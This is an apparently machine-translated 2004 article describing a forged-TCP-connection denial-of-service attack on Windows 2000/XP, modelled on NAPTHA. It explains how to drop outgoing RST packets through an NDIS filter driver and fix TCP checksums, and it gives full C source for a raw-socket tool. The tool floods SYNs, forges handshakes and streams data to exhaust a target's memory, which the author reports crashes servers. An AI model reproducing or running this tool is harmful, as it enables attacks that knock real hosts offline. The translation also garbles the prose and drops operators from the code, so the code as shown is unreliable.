Creation time: 2004-08-16
Article attribute: original
Article submission:
LionD8 (liond8_at_eyou.com)
Novel D.O.S (forged TCP connection D. O.s)
Author: liond8
Email: liond8@126.com
QQ: 10415468
My Website: liond8.126.com
Date: 2004.08.12
Test platform VC 6.0 windows2000 server
Target Platform Windows 2000, Windows XP
Inspired by the NAPTHA attack, it is desirable to extend this fake connection to the personal PC and is not limited by this conditional factor in the LAN. I took time to study the things written below, I am not nonsense. Now take it out and everyone Share, it is not very mature, I hope to discuss with you.
About NAPTHA has written a NaPTHA in 2000. Why use a local area network, just to be better hidden? There is also a more important factor to avoid your host's packets that have a second handshake from the remote host, prevent the system from emitting the RST package disconnects from the forged connection. In addition, there is no much impact on the Windows system for NAPTHA. How much memory consumes Windows. If the counter is refereated, the data is transferred again.
A is an attacker C being attacked:
A SYN --------> C
A SYN, ACK <----- C
A ACK --------> C
A send data -----> C
A Ack <-------- C
A send data -----> C
A Ack <-------- C
...
Test Results:
For a general temporary port, it is quite effective for 1025 ports. Memory continues to rise Finally, the computer can cause a computer because there is no response, and the crash. 20 minutes can drag a web bar server.
For the maximum number of 80 ports, the effect is not very obvious, and the 40M memory is consumed to be repeated, leaving a large amount of Fin_Wait_1 status and ESTABLISHED state.
For some other ports are quite inconvenient due to environmental finite testing. Convenient friends can tell me your test results. Welcome to discuss.
So the following problems to solve are roughly 2:
1.Hook dropped the RST packet sent by this machine
Refer to Flashsky Boss "Writing NDIS Filter Hook Drive Realization IP Packet Filtration"
http://www.xfocus.net/articles/200210/457.html
Just modifying a line of code is OK.
Put IF (packet [13] == 0x2 && sendinterfaceIndex == invalid_pf_if_index)
Modified to IF (packet [13] == 0x4 && sendinterfaceIndex! = Invalid_pf_if_index)
See the original text in detail. The original text is very detailed.
2. Forgery data transmission
Through the Sniffer analysis, you must think that the counterfeit connection is also added to the option data when the SYN package is sent, and negotiates the size of the packet capable of receiving. Otherwise, even if the other party is established, the other party does not return to accept the data, that is, if you want to consume the other party, you can't. For a general SYN scan, the TCP header length is 20 when NaPTHA requests to connect, and it is not optional data. For example, I am in 2000 is 8 bytes, and my friend's 2000 is 12 bytes. Taking my machine as an example 8 bytes, the TCP header length is 28 bytes. TCP_HEAD.TH_LENRES = 0x70.
There is also a place to point out that it is the calculation of the TCP header.
Ushort Checksum (Ushort * Buffer, int size)
{
Unsigned long cksum = 0;
While (size> 1)
{
CKSUM = * Buffer ;
Size - = SizeOf (Ushort);
}
size
{
CKSUM = * (Uchar *) BUFFER;
}
CKSUM = (CKSUM >> 16) (CKSUM & 0xFFF);
CKSUM = (CKSUM >> 16);
Return (Ushort) (~ CKSUM);
}
If there is data over 20 bytes of TCP headers, this and the Windows2000 system are not the same. It has a relationship after analysis and data length. If you say 20-byte IP headers, 20-bytes of TCP headers plus 2 bytes of data. If the TCP papers are calculated using Checksum and 0x4523. But the system is calculated 0x4323
and so:
TCPHEADER.TH_SUM = Checksum ((Ushort *) SzsendBuf, sizeof (psdheader) sizeof (tcpheader) DWSize
TCPHEADER.TH_SUM = HTONS (NTOHS (TCPHEADER.TH_SUM) - (USHORT) DWSIZE);
DWSIZE is the length of the data. Otherwise, the other party does not receive the forged packet. Then it is not possible to achieve the purpose of consuming the other party's memory.
Here is the test code. Considering the effect of this procedure or a certain harm, it is not written in a very convenient test program, and it is necessary to manually snifer option bytes. Then enter the option byte below the command line.
E.g:
Gzdos.exe 192.168.248.128 1025 020405b401010402 1000 65534
Gzdos.exe
Source code:
#include "stdio.h"
#include "winsock2.h"
#include "windows.h"
#include
#include "wchar.h"
#pragma comment (Lib, "WS2_32.LIB")
#define sio_rcvall_wsaiow (IOC_VENDOR, 1)
Char * attack = "192.168.248.128";
Ushort attackport = 135;
Ushort startport = 1;
INT SLEEPTIME = 2000;
Uchar * optbuf = null; // Option bytes
Char * psend = NULL;
DWORD LEN = 0;
Ushort optlen = 0;
Typedef struct ip_head
{
Unsigned char h_verlen;
UNSIGNED Char TOS;
UNSIGNED SHORT TOTAL_LEN;
UNSIGNED short Ident;
UNSIGNED SHORT FRAG_AND_FLAGS;
UNSIGNED CHAR TTL;
UNSIGNED Char Proto;
Unsigned short checksum; unsigned int sourceip;
Unsigned int desip;
} Ipheader;
TypedEf struct tcp_head
{
USHORT TH_SPORT;
USHORT TH_DPORT;
Unsigned int th_seq;
Unsigned int th_ack;
Unsigned char t_lenres;
Unsigned char th_flag;
Ushort TH_WIN;
Ushort TH_SUM;
Ushort TH_URP;
} TCPHEADER;
Typedef struct tsd_hdr
{
UNSIGNED long saddr;
Unsigned long Daddr;
CHAR MBZ;
CHAR PTCL;
UNSIGNED SHORT TCPL;
} PSDHeader;
Typedef struct attack_obj
{
DWORD DWIP;
Ushort uattackport [11];
Struct Attack_Obj * next;
} Atobj;
ATOBJ * ListattackObj = 0;
BOOL INITSTART ();
DWORD gethostip ();
Ushort Checksum (USHORT * BUFFER, INT Size);
DWORD WINAPI THREADSYNFLOOD (LPVOID LP);
Void Senddata (DWORD SEQ, DWORD ACK, USHORT SPORT, USHORT APORT, DWORD SIP, DWORD APORT, CHAR * PBUF, BOOL ISDATA, DWORD DWSIZE);
DWORD WINAPI LISTENINGFUNC (LPVOID LPVOID);
Void banner ();
Void Debugip (DWORD DWIP);
Void ConvertOpt (Char * PU);
Socket Sock = NULL;
Int main (int Argc, char * argv [])
{
Banner ();
psend = (char *) Malloc (800);
MEMSET (Psend, 0x38, 799);
Psend [799] = 0;
Len = Strlen (psend);
IF (Argc <5)
{
Printf ("INPUT Error! / N");
Return -1;
}
Attackip = strDup (Argv [1]);
ATTACKPORT = ATOI (Argv [2]);
Char * Optbuftemp = (char *) STRDUP (Argv [3]);
Convertopt (OptBuftemp);
Optbuf [3] - = 1;
IF (argc == 5)
Sleeptime = ATOI (Argv [4]);
IF (argc == 6)
{
Sleeptime = ATOI (Argv [4]);
STARTPORT = ATOI (Argv [5]);
}
Char Hostname [255] = {0};
IF (initstart () == false)
Return -1;
IF (OptBuf! = NULL)
{
INT i = 0;
Struct hostent * lp = null;
Gethostname (Hostname, 255);
lp = gethostbyname (Hostname);
While (lp-> h_addr_list [i]! = NULL) {
Handle h = NULL;
DWORD DWIP = 0;
DWIP = * (dword *) lp-> h_addr_list [i ];
H = CreateThread (Null, Null, ListeningFunc, (LPVOID) DWIP, NULL, NULL;
IF (h == NULL)
{
Printf ("CREATE LISTENINGFUNC THREAD FALSE! / N");
Return -1;
}
SLEEP (500);
}
Threadsynflood (NULL);
}
Else Return -1;
Sleep (5555555);
}
BOOL INITSTART ()
{
Bool flag;
int NTIMEOVER;
Wsadata wsadata;
IF (WsaStartup (MakeWord (2, 2), & WSADATA)! = 0)
{
Printf ("WSAStartup Error! / N");
Return False;
}
ListattackObj = (atobj *) Calloc (1, sizeof (atobj));
ListattackObj-> dwip = inet_addr (attack);
ListattackObj-> uattackport [0] = htons (attackport);
ListattackObj-> uattackport [1] = 0;
Listattackobj-> next = null;
Sock = NULL;
IF ((Sock = Socket (AF_INET, SOCK_RAW, IPPROTO_IP) == Invalid_socket
{
Printf ("socket setup error! / n");
Return False;
}
Flag = true;
IF (setsockopt (sock, ipproto_ip, ip_hdrincl, (char *) & flag, sizeof (flash) == Socket_ERROR)
{
Printf ("setsockopt ip_hdrincl error! / n");
Return False;
}
NTIMEOVER = 2000;
IF (SetsockOpt, SO_SNDTIMEO, (CHAR *) & ntimeover, sizeof (ntimeover) == Socket_ERROR) // Settings the time
{
Printf ("setsockopt so_sndtimeo error! / n");
Return False;
}
Return True;
}
DWORD WINAPI Threadsynflood (LPVOID LP)
{
ATOBJ * PATOBJ = ListattackObj;
SockAddr_in addr_in;
Ipheader ipheader;
TCPHEADER TCPHEADER;
PSDHeader PSDHead;
Char szsendbuf [1024] = {0};
INT i = 0;
While (PATOBJ! = NULL)
{
Addr_in.sin_family = af_INet;
Addr_in.sin_addr.s_un.s_addr = patobj-> dwip; ipheader.h_verlen = (4 << 4 | sizeof (ipheader) / sizeof (unsigned long);
Ipheader.tos = 0;
Ipheader.total_len = htons (ipHeader) sizeof (TCPHEADER) OPTLEN); // IP total length
ipHeader.Ident = 1;
Ipheader.frag_and_flags = 0x0040;
Ipheader.ttl = 0x80;
Ipheader.proto = ipproto_tcp;
Ipheader.checksum = 0;
Ipheader.destip = Patobj-> dwip;
Ipheader.sourceIP = gethostip ();
TCPHEADER.TH_ACK = 0;
TCPHEADER.TH_LENRES = (Optlen / 4 5) << 4;
TCPHEADER.TH_FLAG = 2;
TCPHEADER.TH_WIN = HTONS (0x4470);
TCPHEADER.TH_URP = 0;
TCPHEADER.TH_SEQ = HTONL (0x00198288);
For (int L = Startport; L <65535; l )
{
INT K = 0;
While (Patobj-> uattackport [k]! = 0)
{
TCPHEADER.TH_DPORT = Patobj-> uattackport [k ];
PSDHeader.daddr = ipheader.destip;
PSDHeader.mbz = 0;
PSDHeader.ptcl = ipproto_tcp;
PSDHeader.tcpl = htons (sizeof (tcpHeader));
INT sendnum = 0;
Int OptlenTemp = Optlen;
TCPHEADER.TH_SPORT = HTONS (L);
TCPHEADER.TH_SUM = 0;
PSDHeader.saddr = ipheader.sourceIP;
Memcpy (Szsendbuf, & Psdheader, Sizeof (psdheader));
Memcpy (Szsendbuf Sizeof (Psdheader), & Tcpheader, Sizeof (TCPHEADER);
Memcpy (szsendbuf sizeof (psdheader) sizeof (TCPHEADER), OPTBUF, OPTLENTEMP
TCPHEADER.TH_SUM = Checksum ((USHORT *) SZSENDBUF, SIZEOF (PSDHEADER) SIZEOF (TCPHEADER) OPTLENTEMP);
TCPHEADER.TH_SUM = HTONS (NTOHS (TCPHEADER.TH_SUM) - (USHORT) OPTLENTEMP;
Memcpy (SzsendBuf, & ipheader, sizeof (ipheader);
Memcpy (szsendbuf sizeof (ipheader), & tcpheader, sizeof (tcpheader);
Memcpy (IpsendBuf Sizeof (Ipheader) Sizeof (TCPHEADER), OPTBUF, OPTLENTEMP
Int Rect = Sendto (Sock, SzsendBuf, SizeOf (Ipheader) SizeOf (TCPHEADER) OptlenTemp, 0, (Struct SockAddr *) & addr_in, sizeof (addr_in)); if (SendNum > 10)
{
Sendnum = 0;
}
IF (Rect == Socket_ERROR)
{
Printf ("Send Error!:% x / n", wsagetlasterror ());
Return False;
}
Else Printf ("SEND OK% D / N", L);
} // endwhile
SLEEP (SleepTime);
}
PATOBJ = PATOBJ-> NEXT;
}
Return 0;
}
DWORD gethostip ()
{
DWORD DWIP = 0;
INT i = 0;
Struct hostent * lp = null;
Char Hostname [255] = {0};
Gethostname (Hostname, 255);
lp = gethostbyname (Hostname);
While (lp-> h_addr_list [i]! = NULL)
i ;
DWIP = * (dword *) lp-> h_addr_list [- i];
Return dwip;
}
Ushort Checksum (Ushort * Buffer, int size)
{
Unsigned long cksum = 0;
While (size> 1)
{
CKSUM = * Buffer ;
Size - = SizeOf (Ushort);
}
size
{
CKSUM = * (Uchar *) BUFFER;
}
CKSUM = (CKSUM >> 16) (CKSUM & 0xFFF);
CKSUM = (CKSUM >> 16);
Return (Ushort) (~ CKSUM);
}
DWORD WINAPI LISTENINGFUNG (LPVOID LPVOID)
{
Socket Rawsock;
SockAddr_in addr_in = {0};
IF ((Rawsock = Socket (AF_INET, SOCK_RAW, IPPROTO_IP)) == Invalid_Socket
{
Printf ("Sniffer Socket Setup Error! / N");
Return False;
}
Addr_in.sin_family = af_INet;
Addr_in.sin_port = htons (8288);
Addr_in.sin_addr.s_un.s_addr = (dword) lpvoid;
/ / Bind the native IP and port on Rawsock
Int ret = bind (Rawsock, (Struct SockAddr *) & addr_in, sizeof (addr_in));
IF (RET == Socket_ERROR)
{
Printf ("Bind False / N");
exit (0);
}
DWORD LPVBUFFER = 1;
DWORD LPCBBYTESRETURNED = 0;
WSAIOCTL (Rawsock, SiO_RCVALL, & LPVBUFFER, SIZEOF (LPVBUFFER), NULL, 0, & LPCBBYTESRETURNED, NULL, NULL); While (True)
{
SockAddr_in from = {0};
INT size = sizeof (from);
Char recvbuf [256] = {0};
// receive the packet
RET = Recvfrom (Rawsock, Recvbuf, Sizeof (Recvbuf), 0, (Struct SockAddr *) & from, & size);
IF (RET! = Socket_ERROR)
{
// Analyze the data package
Ipheader * lpipheader;
LPPHEADER = (ipheader *) Recvbuf;
IF (lpipheader-> proto == ipproto_tcp && lpipheader-> sourceip == inet_addr (attack))
{
TCPHEADER * LPTCPHEADER = (TCPHEADER *) (Recvbuf SizeOf (IpHeader));
// Judgment is the packet returned by the remote open port
IF (lptcpheader-> th_flag == 0x12)
{
IF (lptcpheader-> th_ack == htonl (0x00198289)))
{// Forgery 3rd handshake
Senddata (lptcpheader-> th_ack, htonl (ntohl (lptcpheader-> t_seq) 1), /
LPTCPHEADER-> TH_DPORT, LPTCPHEADER-> TH_SPORT, LPPHEADER-> DESTIP, LPPIPHEADER-> SOURCEIP, NULL, FALSE, 0);
/ / Actively issued a data
Senddata (lptcpheader-> th_ack, htonl (ntohl (lptcpheader-> t_seq) 1), /
LPTCPHEADER-> TH_DPORT, LPTCPHEADER-> TH_SPORT, LPPIPHEADER-> DESTIP, LPPIPHEADER-> SOURCEIP, PSEND, TRUE, LEN;
}
}
Else
{
IF (LPTCPHEADER-> TH_FLAG == 0x10)
/ / Continue to send data
Senddata (lptcpheader-> th_ack, lptcpheader-> th_seq, /
LPTCPHEADER-> TH_DPORT, LPTCPHEADER-> TH_SPORT, LPPIPHEADER-> DESTIP, LPPIPHEADER-> SOURCEIP, PSEND, TRUE, LEN;
}
}
}
} // End while
}
Void Senddata (DWord SEQ, DWORD ACK, USHORT SPORT, USHORT APORT, DWORD SIP, DWORD AP, CHAR * PBUF, BOOL ISDATA, DWORD DWSIZE)
{
SockAddr_in addr_in;
Ipheader ipheader;
TCPHEADER TCPHEADER;
PSDHeader PSDHead;
Char szsendbuf [1024] = {0};
Addr_in.sin_family = af_INet;
Addr_in.sin_port = Aport;
Addr_in.sin_addr.s_un.s_addr = aip; ipHeader.h_verlen = (4 << 4 | sizeof (ipheader) / sizeof (unsigned long);
Ipheader.tos = 0;
ipHeader.Ident = 1;
Ipheader.frag_and_flags = 0x0040;
Ipheader.ttl = 0x80;
Ipheader.proto = ipproto_tcp;
Ipheader.checksum = 0;
Ipheader.destip = AIP;
Ipheader.sourceip = SIP;
TCPHEADER.TH_DPORT = APORT;
TCPHEADER.TH_ACK = ACK;
TCPHEADER.TH_LENRES = (SIZEOF (TCPHEADER) / 4 << 4 | 0);
TCPHEADER.TH_SEQ = SEQ;
TCPHEADER.TH_WIN = HTONS (0x4470);
TCPHEADER.TH_SPORT = Sport;
Ipheader.total_len = htons (ipheader) sizeof (tcpheader) DWSIZE
IF (! isdata)
{
TCPHEADER.TH_FLAG = 0x10;
} // ACK
Else
{
TCPHEADER.TH_FLAG = 0x18;
}
TCPHEADER.TH_URP = 0;
PSDHeader.daddr = ipheader.destip;
PSDHeader.mbz = 0;
PSDHeader.ptcl = ipproto_tcp;
PSDHeader.tcpl = htons (sizeof (tcpHeader));
TCPHEADER.TH_SUM = 0;
PSDHeader.saddr = ipheader.sourceIP;
Memcpy (Szsendbuf, & Psdheader, Sizeof (psdheader));
Memcpy (Szsendbuf Sizeof (Psdheader), & Tcpheader, Sizeof (TCPHEADER);
IF (PBUF! = NULL)
{
Memcpy (szsendbuf sizeof (psdheader) sizeof (TCPHEADER), PBUF, DWSIZE
TCPHEADER.TH_SUM = Checksum ((Ushort *) SzsendBuf, sizeof (psdheader) sizeof (tcpheader) DWSize
TCPHEADER.TH_SUM = HTONS (NTOHS (TCPHEADER.TH_SUM) - (USHORT) DWSIZE);
}
Else
{
TCPHEADER.TH_SUM = Checksum ((Ushort *) SzsendBuf, SizeOf (PSDHeader) Sizeof (TCPHEADER));
}
Memcpy (SzsendBuf, & ipheader, sizeof (ipheader);
Memcpy (szsendbuf sizeof (ipheader), & tcpheader, sizeof (tcpheader);
INT Rect = 0;
IF (PBUF == Null)
Rect = Sendto (Sock, SzsendBuf, Sizeof (Ipheader) Sizeof (TCPHEADER), 0, (Struct SockAddr *) & addr_in, sizeof (addr_in); ELSE
{
Memcpy (SzsendBuf Sizeof (Ipheter) Sizeof (TCPHEADER), PBUF, DWSIZE
Rect = Sendto (Sock, SzsendBuf, SizeOf (Ipheader) SizeOf (TCPHEADER) DWSIZE, 0, (Struct SockAddr *) & addr_in, sizeof (addr_in));
}
IF (Rect == Socket_ERROR)
{
Printf ("Send Error!:% x / n", wsagetlasterror ());
Return;
}
Else
{
IF (PBUF! = NULL)
Printf ("SendData OK% D / N", NTOHS (Sport);
Else
Printf ("Sendack OK% D / N", NTOHS (SPORT));
}
}
Void banner ()
{
PRINTF ("***************************************************** ***** / n ");
Printf ("Dog D. O.S Test / N");
Printf ("Maker By LionD8. QQ: 10415468. Email: liond8@eyou.com/n");
Printf ("Welcome to My Website:
http://liond8.126.com/n ");
Printf ("is for use only for licensed tests, otherwise it will cause any legal dispute to self-contained / N");
PRINTF ("***************************************************** ***** / n ");
Printf ("GZDOS.exe
}
Void Debugip (DWORD DWIP)
{
Struct in_addr a = {0};
A.s_un.s_addr = dwip;
Printf ("% s", inet_ntoa (a));
}
Void Convertopt (Char * Pu)
{
INT i = 0, LENTEMP;
LENTEMP = STRLEN (PU);
Optlen = LENTEMP / 2;
Optbuf = (uchar *) Malloc (Optlen);
INT K = 0;
For (i = 0; I { BYTE TEMPB = 0; Tempb = pu [i 1]; IF (Tempb <'9') Tempb = tempb - 0x30; Else { Tempb = tempb - 0x37; } Optbuf [k] = TEMPB; TEMPB = 0; Tempb = pu [i]; IF (Tempb <'9') TEMPB = Tempb - 0x30; Else { Tempb = tempb - 0x37; } Tempb = tempb << 4; Optbuf [k] = TEMPB; K ; } } references: Writing NDIS filter hook driver Implement IP package filter TCP / IP detail the first volume
